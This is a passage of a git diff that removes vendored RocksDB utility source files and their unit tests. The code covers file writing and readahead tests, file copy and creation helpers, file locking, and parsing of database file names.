-  WritableFile* writable_file() const { return writable_file_.get(); }
-
-  bool use_direct_io() { return writable_file_->use_direct_io(); }
-
- private:
-  // Used when os buffering is OFF and we are writing
-  // DMA such as in Direct I/O mode
-#ifndef ROCKSDB_LITE
-  Status WriteDirect();
-#endif  // !ROCKSDB_LITE
-  // Normal write
-  Status WriteBuffered(const char* data, size_t size);
-  Status RangeSync(uint64_t offset, uint64_t nbytes);
-  Status SyncInternal(bool use_fsync);
-};
-
-class FilePrefetchBuffer {
- public:
-  Status Prefetch(RandomAccessFileReader* reader, uint64_t offset, size_t n);
-  bool TryReadFromCache(uint64_t offset, size_t n, Slice* result) const;
-
- private:
-  AlignedBuffer buffer_;
-  uint64_t buffer_offset_;
-  size_t buffer_len_;
-};
-
-extern Status NewWritableFile(Env* env, const std::string& fname,
-                              unique_ptr<WritableFile>* result,
-                              const EnvOptions& options);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/file_reader_writer_test.cc b/thirdparty/rocksdb/util/file_reader_writer_test.cc
deleted file mode 100644
index 45675e9..0000000
--- a/thirdparty/rocksdb/util/file_reader_writer_test.cc
+++ /dev/null
@@ -1,325 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/file_reader_writer.h"
-#include <algorithm>
-#include <vector>
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class WritableFileWriterTest : public testing::Test {};
-
-const uint32_t kMb = 1 << 20;
-
-TEST_F(WritableFileWriterTest, RangeSync) {
-  class FakeWF : public WritableFile {
-   public:
-    explicit FakeWF() : size_(0), last_synced_(0) {}
-    ~FakeWF() {}
-
-    Status Append(const Slice& data) override {
-      size_ += data.size();
-      return Status::OK();
-    }
-    virtual Status Truncate(uint64_t size) override {
-      return Status::OK();
-    }
-    Status Close() override {
-      EXPECT_GE(size_, last_synced_ + kMb);
-      EXPECT_LT(size_, last_synced_ + 2 * kMb);
-      // Make sure random writes generated enough writes.
-      EXPECT_GT(size_, 10 * kMb);
-      return Status::OK();
-    }
-    Status Flush() override { return Status::OK(); }
-    Status Sync() override { return Status::OK(); }
-    Status Fsync() override { return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override {}
-    uint64_t GetFileSize() override { return size_; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {}
-    size_t GetUniqueId(char* id, size_t max_size) const override { return 0; }
-    Status InvalidateCache(size_t offset, size_t length) override {
-      return Status::OK();
-    }
-
-   protected:
-    Status Allocate(uint64_t offset, uint64_t len) override { return Status::OK(); }
-    Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-      EXPECT_EQ(offset % 4096, 0u);
-      EXPECT_EQ(nbytes % 4096, 0u);
-
-      EXPECT_EQ(offset, last_synced_);
-      last_synced_ = offset + nbytes;
-      EXPECT_GE(size_, last_synced_ + kMb);
-      if (size_ > 2 * kMb) {
-        EXPECT_LT(size_, last_synced_ + 2 * kMb);
-      }
-      return Status::OK();
-    }
-
-    uint64_t size_;
-    uint64_t last_synced_;
-  };
-
-  EnvOptions env_options;
-  env_options.bytes_per_sync = kMb;
-  unique_ptr<FakeWF> wf(new FakeWF);
-  unique_ptr<WritableFileWriter> writer(
-      new WritableFileWriter(std::move(wf), env_options));
-  Random r(301);
-  std::unique_ptr<char[]> large_buf(new char[10 * kMb]);
-  for (int i = 0; i < 1000; i++) {
-    int skew_limit = (i < 700) ? 10 : 15;
-    uint32_t num = r.Skewed(skew_limit) * 100 + r.Uniform(100);
-    writer->Append(Slice(large_buf.get(), num));
-
-    // Flush in a chance of 1/10.
-    if (r.Uniform(10) == 0) {
-      writer->Flush();
-    }
-  }
-  writer->Close();
-}
-
-TEST_F(WritableFileWriterTest, IncrementalBuffer) {
-  class FakeWF : public WritableFile {
-   public:
-    explicit FakeWF(std::string* _file_data, bool _use_direct_io,
-                    bool _no_flush)
-        : file_data_(_file_data),
-          use_direct_io_(_use_direct_io),
-          no_flush_(_no_flush) {}
-    ~FakeWF() {}
-
-    Status Append(const Slice& data) override {
-      file_data_->append(data.data(), data.size());
-      size_ += data.size();
-      return Status::OK();
-    }
-    Status PositionedAppend(const Slice& data, uint64_t pos) override {
-      EXPECT_TRUE(pos % 512 == 0);
-      EXPECT_TRUE(data.size() % 512 == 0);
-      file_data_->resize(pos);
-      file_data_->append(data.data(), data.size());
-      size_ += data.size();
-      return Status::OK();
-    }
-
-    virtual Status Truncate(uint64_t size) override {
-      file_data_->resize(size);
-      return Status::OK();
-    }
-    Status Close() override { return Status::OK(); }
-    Status Flush() override { return Status::OK(); }
-    Status Sync() override { return Status::OK(); }
-    Status Fsync() override { return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override {}
-    uint64_t GetFileSize() override { return size_; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {}
-    size_t GetUniqueId(char* id, size_t max_size) const override { return 0; }
-    Status InvalidateCache(size_t offset, size_t length) override {
-      return Status::OK();
-    }
-    bool use_direct_io() const override { return use_direct_io_; }
-
-    std::string* file_data_;
-    bool use_direct_io_;
-    bool no_flush_;
-    size_t size_ = 0;
-  };
-
-  Random r(301);
-  const int kNumAttempts = 50;
-  for (int attempt = 0; attempt < kNumAttempts; attempt++) {
-    bool no_flush = (attempt % 3 == 0);
-    EnvOptions env_options;
-    env_options.writable_file_max_buffer_size =
-        (attempt < kNumAttempts / 2) ? 512 * 1024 : 700 * 1024;
-    std::string actual;
-    unique_ptr<FakeWF> wf(new FakeWF(&actual,
-#ifndef ROCKSDB_LITE
-                                     attempt % 2 == 1,
-#else
-                                     false,
-#endif
-                                     no_flush));
-    unique_ptr<WritableFileWriter> writer(
-        new WritableFileWriter(std::move(wf), env_options));
-
-    std::string target;
-    for (int i = 0; i < 20; i++) {
-      uint32_t num = r.Skewed(16) * 100 + r.Uniform(100);
-      std::string random_string;
-      test::RandomString(&r, num, &random_string);
-      writer->Append(Slice(random_string.c_str(), num));
-      target.append(random_string.c_str(), num);
-
-      // In some attempts, flush in a chance of 1/10.
-      if (!no_flush && r.Uniform(10) == 0) {
-        writer->Flush();
-      }
-    }
-    writer->Flush();
-    writer->Close();
-    ASSERT_EQ(target.size(), actual.size());
-    ASSERT_EQ(target, actual);
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(WritableFileWriterTest, AppendStatusReturn) {
-  class FakeWF : public WritableFile {
-   public:
-    explicit FakeWF() : use_direct_io_(false), io_error_(false) {}
-
-    virtual bool use_direct_io() const override { return use_direct_io_; }
-    Status Append(const Slice& data) override {
-      if (io_error_) {
-        return Status::IOError("Fake IO error");
-      }
-      return Status::OK();
-    }
-    Status PositionedAppend(const Slice& data, uint64_t) override {
-      if (io_error_) {
-        return Status::IOError("Fake IO error");
-      }
-      return Status::OK();
-    }
-    Status Close() override { return Status::OK(); }
-    Status Flush() override { return Status::OK(); }
-    Status Sync() override { return Status::OK(); }
-    void Setuse_direct_io(bool val) { use_direct_io_ = val; }
-    void SetIOError(bool val) { io_error_ = val; }
-
-   protected:
-    bool use_direct_io_;
-    bool io_error_;
-  };
-  unique_ptr<FakeWF> wf(new FakeWF());
-  wf->Setuse_direct_io(true);
-  unique_ptr<WritableFileWriter> writer(
-      new WritableFileWriter(std::move(wf), EnvOptions()));
-
-  ASSERT_OK(writer->Append(std::string(2 * kMb, 'a')));
-
-  // Next call to WritableFile::Append() should fail
-  dynamic_cast<FakeWF*>(writer->writable_file())->SetIOError(true);
-  ASSERT_NOK(writer->Append(std::string(2 * kMb, 'b')));
-}
-#endif
-
-class ReadaheadRandomAccessFileTest
-    : public testing::Test,
-      public testing::WithParamInterface<size_t> {
- public:
-  static std::vector<size_t> GetReadaheadSizeList() {
-    return {1lu << 12, 1lu << 16};
-  }
-  virtual void SetUp() override {
-    readahead_size_ = GetParam();
-    scratch_.reset(new char[2 * readahead_size_]);
-    ResetSourceStr();
-  }
-  ReadaheadRandomAccessFileTest() : control_contents_() {}
-  std::string Read(uint64_t offset, size_t n) {
-    Slice result;
-    test_read_holder_->Read(offset, n, &result, scratch_.get());
-    return std::string(result.data(), result.size());
-  }
-  void ResetSourceStr(const std::string& str = "") {
-    auto write_holder = std::unique_ptr<WritableFileWriter>(
-        test::GetWritableFileWriter(new test::StringSink(&control_contents_)));
-    write_holder->Append(Slice(str));
-    write_holder->Flush();
-    auto read_holder = std::unique_ptr<RandomAccessFile>(
-        new test::StringSource(control_contents_));
-    test_read_holder_ =
-        NewReadaheadRandomAccessFile(std::move(read_holder), readahead_size_);
-  }
-  size_t GetReadaheadSize() const { return readahead_size_; }
-
- private:
-  size_t readahead_size_;
-  Slice control_contents_;
-  std::unique_ptr<RandomAccessFile> test_read_holder_;
-  std::unique_ptr<char[]> scratch_;
-};
-
-TEST_P(ReadaheadRandomAccessFileTest, EmptySourceStrTest) {
-  ASSERT_EQ("", Read(0, 1));
-  ASSERT_EQ("", Read(0, 0));
-  ASSERT_EQ("", Read(13, 13));
-}
-
-TEST_P(ReadaheadRandomAccessFileTest, SourceStrLenLessThanReadaheadSizeTest) {
-  std::string str = "abcdefghijklmnopqrs";
-  ResetSourceStr(str);
-  ASSERT_EQ(str.substr(3, 4), Read(3, 4));
-  ASSERT_EQ(str.substr(0, 3), Read(0, 3));
-  ASSERT_EQ(str, Read(0, str.size()));
-  ASSERT_EQ(str.substr(7, std::min(static_cast<int>(str.size()) - 7, 30)),
-            Read(7, 30));
-  ASSERT_EQ("", Read(100, 100));
-}
-
-TEST_P(ReadaheadRandomAccessFileTest,
-       SourceStrLenCanBeGreaterThanReadaheadSizeTest) {
-  Random rng(42);
-  for (int k = 0; k < 100; ++k) {
-    size_t strLen = k * GetReadaheadSize() +
-                    rng.Uniform(static_cast<int>(GetReadaheadSize()));
-    std::string str =
-        test::RandomHumanReadableString(&rng, static_cast<int>(strLen));
-    ResetSourceStr(str);
-    for (int test = 1; test <= 100; ++test) {
-      size_t offset = rng.Uniform(static_cast<int>(strLen));
-      size_t n = rng.Uniform(static_cast<int>(GetReadaheadSize()));
-      ASSERT_EQ(str.substr(offset, std::min(n, str.size() - offset)),
-                Read(offset, n));
-    }
-  }
-}
-
-TEST_P(ReadaheadRandomAccessFileTest, NExceedReadaheadTest) {
-  Random rng(7);
-  size_t strLen = 4 * GetReadaheadSize() +
-                  rng.Uniform(static_cast<int>(GetReadaheadSize()));
-  std::string str =
-      test::RandomHumanReadableString(&rng, static_cast<int>(strLen));
-  ResetSourceStr(str);
-  for (int test = 1; test <= 100; ++test) {
-    size_t offset = rng.Uniform(static_cast<int>(strLen));
-    size_t n =
-        GetReadaheadSize() + rng.Uniform(static_cast<int>(GetReadaheadSize()));
-    ASSERT_EQ(str.substr(offset, std::min(n, str.size() - offset)),
-              Read(offset, n));
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    EmptySourceStrTest, ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-INSTANTIATE_TEST_CASE_P(
-    SourceStrLenLessThanReadaheadSizeTest, ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-INSTANTIATE_TEST_CASE_P(
-    SourceStrLenCanBeGreaterThanReadaheadSizeTest,
-    ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-INSTANTIATE_TEST_CASE_P(
-    NExceedReadaheadTest, ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/file_util.cc b/thirdparty/rocksdb/util/file_util.cc
deleted file mode 100644
index c6323b3..0000000
--- a/thirdparty/rocksdb/util/file_util.cc
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/file_util.h"
-
-#include <string>
-#include <algorithm>
-
-#include "rocksdb/env.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-// Utility function to copy a file up to a specified length
-Status CopyFile(Env* env, const std::string& source,
-                const std::string& destination, uint64_t size, bool use_fsync) {
-  const EnvOptions soptions;
-  Status s;
-  unique_ptr<SequentialFileReader> src_reader;
-  unique_ptr<WritableFileWriter> dest_writer;
-
-  {
-    unique_ptr<SequentialFile> srcfile;
-  s = env->NewSequentialFile(source, &srcfile, soptions);
-  unique_ptr<WritableFile> destfile;
-  if (s.ok()) {
-    s = env->NewWritableFile(destination, &destfile, soptions);
-  } else {
-    return s;
-  }
-
-  if (size == 0) {
-    // default argument means copy everything
-    if (s.ok()) {
-      s = env->GetFileSize(source, &size);
-    } else {
-      return s;
-    }
-  }
-  src_reader.reset(new SequentialFileReader(std::move(srcfile)));
-  dest_writer.reset(new WritableFileWriter(std::move(destfile), soptions));
-  }
-
-  char buffer[4096];
-  Slice slice;
-  while (size > 0) {
-    size_t bytes_to_read = std::min(sizeof(buffer), static_cast<size_t>(size));
-    if (s.ok()) {
-      s = src_reader->Read(bytes_to_read, &slice, buffer);
-    }
-    if (s.ok()) {
-      if (slice.size() == 0) {
-        return Status::Corruption("file too small");
-      }
-      s = dest_writer->Append(slice);
-    }
-    if (!s.ok()) {
-      return s;
-    }
-    size -= slice.size();
-  }
-  dest_writer->Sync(use_fsync);
-  return Status::OK();
-}
-
-// Utility function to create a file with the provided contents
-Status CreateFile(Env* env, const std::string& destination,
-                  const std::string& contents) {
-  const EnvOptions soptions;
-  Status s;
-  unique_ptr<WritableFileWriter> dest_writer;
-
-  unique_ptr<WritableFile> destfile;
-  s = env->NewWritableFile(destination, &destfile, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  dest_writer.reset(new WritableFileWriter(std::move(destfile), soptions));
-  return dest_writer->Append(Slice(contents));
-}
-
-Status DeleteSSTFile(const ImmutableDBOptions* db_options,
-                     const std::string& fname, uint32_t path_id) {
-  // TODO(tec): support sst_file_manager for multiple path_ids
-#ifndef ROCKSDB_LITE
-  auto sfm =
-      static_cast<SstFileManagerImpl*>(db_options->sst_file_manager.get());
-  if (sfm && path_id == 0) {
-    return sfm->ScheduleFileDeletion(fname);
-  } else {
-    return db_options->env->DeleteFile(fname);
-  }
-#else
-  // SstFileManager is not supported in ROCKSDB_LITE
-  return db_options->env->DeleteFile(fname);
-#endif
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/file_util.h b/thirdparty/rocksdb/util/file_util.h
deleted file mode 100644
index e59377a..0000000
--- a/thirdparty/rocksdb/util/file_util.h
+++ /dev/null
@@ -1,27 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include <string>
-
-#include "options/db_options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-// use_fsync maps to options.use_fsync, which determines the way that
-// the file is synced after copying.
-extern Status CopyFile(Env* env, const std::string& source,
-                       const std::string& destination, uint64_t size,
-                       bool use_fsync);
-
-extern Status CreateFile(Env* env, const std::string& destination,
-                         const std::string& contents);
-
-extern Status DeleteSSTFile(const ImmutableDBOptions* db_options,
-                            const std::string& fname, uint32_t path_id);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/filelock_test.cc b/thirdparty/rocksdb/util/filelock_test.cc
deleted file mode 100644
index cb4bd43..0000000
--- a/thirdparty/rocksdb/util/filelock_test.cc
+++ /dev/null
@@ -1,59 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "rocksdb/status.h"
-#include "rocksdb/env.h"
-
-#include <vector>
-#include "util/coding.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class LockTest : public testing::Test {
- public:
-  static LockTest* current_;
-  std::string file_;
-  rocksdb::Env* env_;
-
-  LockTest() : file_(test::TmpDir() + "/db_testlock_file"),
-               env_(rocksdb::Env::Default()) {
-    current_ = this;
-  }
-
-  ~LockTest() {
-  }
-
-  Status LockFile(FileLock** db_lock) {
-    return env_->LockFile(file_, db_lock);
-  }
-
-  Status UnlockFile(FileLock* db_lock) {
-    return env_->UnlockFile(db_lock);
-  }
-};
-LockTest* LockTest::current_;
-
-TEST_F(LockTest, LockBySameThread) {
-  FileLock* lock1;
-  FileLock* lock2;
-
-  // acquire a lock on a file
-  ASSERT_OK(LockFile(&lock1));
-
-  // re-acquire the lock on the same file. This should fail.
-  ASSERT_TRUE(LockFile(&lock2).IsIOError());
-
-  // release the lock
-  ASSERT_OK(UnlockFile(lock1));
-
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/filename.cc b/thirdparty/rocksdb/util/filename.cc
deleted file mode 100644
index fa1618e..0000000
--- a/thirdparty/rocksdb/util/filename.cc
+++ /dev/null
@@ -1,403 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/filename.h"
-#include <inttypes.h>
-
-#include <ctype.h>
-#include <stdio.h>
-#include <vector>
-#include "rocksdb/env.h"
-#include "util/file_reader_writer.h"
-#include "util/logging.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-static const std::string kRocksDbTFileExt = "sst";
-static const std::string kLevelDbTFileExt = "ldb";
-static const std::string kRocksDBBlobFileExt = "blob";
-
-// Given a path, flatten the path name by replacing all chars not in
-// {[0-9,a-z,A-Z,-,_,.]} with _. And append '_LOG\0' at the end.
-// Return the number of chars stored in dest not including the trailing '\0'.
-static size_t GetInfoLogPrefix(const std::string& path, char* dest, int len) {
-  const char suffix[] = "_LOG";
-
-  size_t write_idx = 0;
-  size_t i = 0;
-  size_t src_len = path.size();
-
-  while (i < src_len && write_idx < len - sizeof(suffix)) {
-    if ((path[i] >= 'a' && path[i] <= 'z') ||
-        (path[i] >= '0' && path[i] <= '9') ||
-        (path[i] >= 'A' && path[i] <= 'Z') ||
-        path[i] == '-' ||
-        path[i] == '.' ||
-        path[i] == '_'){
-      dest[write_idx++] = path[i];
-    } else {
-      if (i > 0) {
-        dest[write_idx++] = '_';
-      }
-    }
-    i++;
-  }
-  assert(sizeof(suffix) <= len - write_idx);
-  // "\0" is automatically added by snprintf
-  snprintf(dest + write_idx, len - write_idx, suffix);
-  write_idx += sizeof(suffix) - 1;
-  return write_idx;
-}
-
-static std::string MakeFileName(const std::string& name, uint64_t number,
-                                const char* suffix) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "/%06llu.%s",
-           static_cast<unsigned long long>(number),
-           suffix);
-  return name + buf;
-}
-
-std::string LogFileName(const std::string& name, uint64_t number) {
-  assert(number > 0);
-  return MakeFileName(name, number, "log");
-}
-
-std::string BlobFileName(const std::string& blobdirname, uint64_t number) {
-  assert(number > 0);
-  return MakeFileName(blobdirname, number, kRocksDBBlobFileExt.c_str());
-}
-
-std::string ArchivalDirectory(const std::string& dir) {
-  return dir + "/" + ARCHIVAL_DIR;
-}
-std::string ArchivedLogFileName(const std::string& name, uint64_t number) {
-  assert(number > 0);
-  return MakeFileName(name + "/" + ARCHIVAL_DIR, number, "log");
-}
-
-std::string MakeTableFileName(const std::string& path, uint64_t number) {
-  return MakeFileName(path, number, kRocksDbTFileExt.c_str());
-}
-
-std::string Rocks2LevelTableFileName(const std::string& fullname) {
-  assert(fullname.size() > kRocksDbTFileExt.size() + 1);
-  if (fullname.size() <= kRocksDbTFileExt.size() + 1) {
-    return "";
-  }
-  return fullname.substr(0, fullname.size() - kRocksDbTFileExt.size()) +
-         kLevelDbTFileExt;
-}
-
-uint64_t TableFileNameToNumber(const std::string& name) {
-  uint64_t number = 0;
-  uint64_t base = 1;
-  int pos = static_cast<int>(name.find_last_of('.'));
-  while (--pos >= 0 && name[pos] >= '0' && name[pos] <= '9') {
-    number += (name[pos] - '0') * base;
-    base *= 10;
-  }
-  return number;
-}
-
-std::string TableFileName(const std::vector<DbPath>& db_paths, uint64_t number,
-                          uint32_t path_id) {
-  assert(number > 0);
-  std::string path;
-  if (path_id >= db_paths.size()) {
-    path = db_paths.back().path;
-  } else {
-    path = db_paths[path_id].path;
-  }
-  return MakeTableFileName(path, number);
-}
-
-void FormatFileNumber(uint64_t number, uint32_t path_id, char* out_buf,
-                      size_t out_buf_size) {
-  if (path_id == 0) {
-    snprintf(out_buf, out_buf_size, "%" PRIu64, number);
-  } else {
-    snprintf(out_buf, out_buf_size, "%" PRIu64
-                                    "(path "
-                                    "%" PRIu32 ")",
-             number, path_id);
-  }
-}
-
-std::string DescriptorFileName(const std::string& dbname, uint64_t number) {
-  assert(number > 0);
-  char buf[100];
-  snprintf(buf, sizeof(buf), "/MANIFEST-%06llu",
-           static_cast<unsigned long long>(number));
-  return dbname + buf;
-}
-
-std::string CurrentFileName(const std::string& dbname) {
-  return dbname + "/CURRENT";
-}
-
-std::string LockFileName(const std::string& dbname) {
-  return dbname + "/LOCK";
-}
-
-std::string TempFileName(const std::string& dbname, uint64_t number) {
-  return MakeFileName(dbname, number, kTempFileNameSuffix.c_str());
-}
-
-InfoLogPrefix::InfoLogPrefix(bool has_log_dir,
-                             const std::string& db_absolute_path) {
-  if (!has_log_dir) {
-    const char kInfoLogPrefix[] = "LOG";
-    // "\0" is automatically added to the end
-    snprintf(buf, sizeof(buf), kInfoLogPrefix);
-    prefix = Slice(buf, sizeof(kInfoLogPrefix) - 1);
-  } else {
-    size_t len = GetInfoLogPrefix(db_absolute_path, buf, sizeof(buf));
-    prefix = Slice(buf, len);
-  }
-}
-
-std::string InfoLogFileName(const std::string& dbname,
-    const std::string& db_path, const std::string& log_dir) {
-  if (log_dir.empty()) {
-    return dbname + "/LOG";
-  }
-
-  InfoLogPrefix info_log_prefix(true, db_path);
-  return log_dir + "/" + info_log_prefix.buf;
-}
-
-// Return the name of the old info log file for "dbname".
-std::string OldInfoLogFileName(const std::string& dbname, uint64_t ts,
-    const std::string& db_path, const std::string& log_dir) {
-  char buf[50];
-  snprintf(buf, sizeof(buf), "%llu", static_cast<unsigned long long>(ts));
-
-  if (log_dir.empty()) {
-    return dbname + "/LOG.old." + buf;
-  }
-
-  InfoLogPrefix info_log_prefix(true, db_path);
-  return log_dir + "/" + info_log_prefix.buf + ".old." + buf;
-}
-
-std::string OptionsFileName(const std::string& dbname, uint64_t file_num) {
-  char buffer[256];
-  snprintf(buffer, sizeof(buffer), "%s%06" PRIu64,
-           kOptionsFileNamePrefix.c_str(), file_num);
-  return dbname + "/" + buffer;
-}
-
-std::string TempOptionsFileName(const std::string& dbname, uint64_t file_num) {
-  char buffer[256];
-  snprintf(buffer, sizeof(buffer), "%s%06" PRIu64 ".%s",
-           kOptionsFileNamePrefix.c_str(), file_num,
-           kTempFileNameSuffix.c_str());
-  return dbname + "/" + buffer;
-}
-
-std::string MetaDatabaseName(const std::string& dbname, uint64_t number) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "/METADB-%llu",
-           static_cast<unsigned long long>(number));
-  return dbname + buf;
-}
-
-std::string IdentityFileName(const std::string& dbname) {
-  return dbname + "/IDENTITY";
-}
-
-// Owned filenames have the form:
-//    dbname/IDENTITY
-//    dbname/CURRENT
-//    dbname/LOCK
-//    dbname/<info_log_name_prefix>
-//    dbname/<info_log_name_prefix>.old.[0-9]+
-//    dbname/MANIFEST-[0-9]+
-//    dbname/[0-9]+.(log|sst|blob)
-//    dbname/METADB-[0-9]+
-//    dbname/OPTIONS-[0-9]+
-//    dbname/OPTIONS-[0-9]+.dbtmp
-//    Disregards / at the beginning
-bool ParseFileName(const std::string& fname,
-                   uint64_t* number,
-                   FileType* type,
-                   WalFileType* log_type) {
-  return ParseFileName(fname, number, "", type, log_type);
-}
-
-bool ParseFileName(const std::string& fname, uint64_t* number,
-                   const Slice& info_log_name_prefix, FileType* type,
-                   WalFileType* log_type) {
-  Slice rest(fname);
-  if (fname.length() > 1 && fname[0] == '/') {
-    rest.remove_prefix(1);
-  }
-  if (rest == "IDENTITY") {
-    *number = 0;
-    *type = kIdentityFile;
-  } else if (rest == "CURRENT") {
-    *number = 0;
-    *type = kCurrentFile;
-  } else if (rest == "LOCK") {
-    *number = 0;
-    *type = kDBLockFile;
-  } else if (info_log_name_prefix.size() > 0 &&
-             rest.starts_with(info_log_name_prefix)) {
-    rest.remove_prefix(info_log_name_prefix.size());
-    if (rest == "" || rest == ".old") {
-      *number = 0;
-      *type = kInfoLogFile;
-    } else if (rest.starts_with(".old.")) {
-      uint64_t ts_suffix;
-      // sizeof also counts the trailing '\0'.
-      rest.remove_prefix(sizeof(".old.") - 1);
-      if (!ConsumeDecimalNumber(&rest, &ts_suffix)) {
-        return false;
-      }
-      *number = ts_suffix;
-      *type = kInfoLogFile;
-    }
-  } else if (rest.starts_with("MANIFEST-")) {
-    rest.remove_prefix(strlen("MANIFEST-"));
-    uint64_t num;
-    if (!ConsumeDecimalNumber(&rest, &num)) {
-      return false;
-    }
-    if (!rest.empty()) {
-      return false;
-    }
-    *type = kDescriptorFile;
-    *number = num;
-  } else if (rest.starts_with("METADB-")) {
-    rest.remove_prefix(strlen("METADB-"));
-    uint64_t num;
-    if (!ConsumeDecimalNumber(&rest, &num)) {
-      return false;
-    }
-    if (!rest.empty()) {
-      return false;
-    }
-    *type = kMetaDatabase;
-    *number = num;
-  } else if (rest.starts_with(kOptionsFileNamePrefix)) {
-    uint64_t ts_suffix;
-    bool is_temp_file = false;
-    rest.remove_prefix(kOptionsFileNamePrefix.size());
-    const std::string kTempFileNameSuffixWithDot =
-        std::string(".") + kTempFileNameSuffix;
-    if (rest.ends_with(kTempFileNameSuffixWithDot)) {
-      rest.remove_suffix(kTempFileNameSuffixWithDot.size());
-      is_temp_file = true;
-    }
-    if (!ConsumeDecimalNumber(&rest, &ts_suffix)) {
-      return false;
-    }
-    *number = ts_suffix;
-    *type = is_temp_file ? kTempFile : kOptionsFile;
-  } else {
-    // Avoid strtoull() to keep filename format independent of the
-    // current locale
-    bool archive_dir_found = false;
-    if (rest.starts_with(ARCHIVAL_DIR)) {
-      if (rest.size() <= ARCHIVAL_DIR.size()) {
-        return false;
-      }
-      rest.remove_prefix(ARCHIVAL_DIR.size() + 1); // Add 1 to remove / also
-      if (log_type) {
-        *log_type = kArchivedLogFile;
-      }
-      archive_dir_found = true;
-    }
-    uint64_t num;
-    if (!ConsumeDecimalNumber(&rest, &num)) {
-      return false;
-    }
-    if (rest.size() <= 1 || rest[0] != '.') {
-      return false;
-    }
-    rest.remove_prefix(1);
-
-    Slice suffix = rest;
-    if (suffix == Slice("log")) {
-      *type = kLogFile;
-      if (log_type && !archive_dir_found) {
-        *log_type = kAliveLogFile;
-      }
-    } else if (archive_dir_found) {
-      return false; // Archive dir can contain only log files
-    } else if (suffix == Slice(kRocksDbTFileExt) ||
-               suffix == Slice(kLevelDbTFileExt)) {
-      *type = kTableFile;
-    } else if (suffix == Slice(kRocksDBBlobFileExt)) {
-      *type = kBlobFile;
-    } else if (suffix == Slice(kTempFileNameSuffix)) {
-      *type = kTempFile;
-    } else {
-      return false;
-    }
-    *number = num;
-  }
-  return true;
-}
-
-Status SetCurrentFile(Env* env, const std::string& dbname,
-                      uint64_t descriptor_number,
-                      Directory* directory_to_fsync) {
-  // Remove leading "dbname/" and add newline to manifest file name
-  std::string manifest = DescriptorFileName(dbname, descriptor_number);
-  Slice contents = manifest;
-  assert(contents.starts_with(dbname + "/"));
-  contents.remove_prefix(dbname.size() + 1);
-  std::string tmp = TempFileName(dbname, descriptor_number);
-  Status s = WriteStringToFile(env, contents.ToString() + "\n", tmp, true);
-  if (s.ok()) {
-    TEST_KILL_RANDOM("SetCurrentFile:0", rocksdb_kill_odds * REDUCE_ODDS2);
-    s = env->RenameFile(tmp, CurrentFileName(dbname));
-    TEST_KILL_RANDOM("SetCurrentFile:1", rocksdb_kill_odds * REDUCE_ODDS2);
-  }
-  if (s.ok()) {
-    if (directory_to_fsync != nullptr) {
-      directory_to_fsync->Fsync();
-    }
-  } else {
-    env->DeleteFile(tmp);
-  }
-  return s;
-}
-
-Status SetIdentityFile(Env* env, const std::string& dbname) {
-  std::string id = env->GenerateUniqueId();
-  assert(!id.empty());
-  // Reserve the filename dbname/000000.dbtmp for the temporary identity file
-  std::string tmp = TempFileName(dbname, 0);
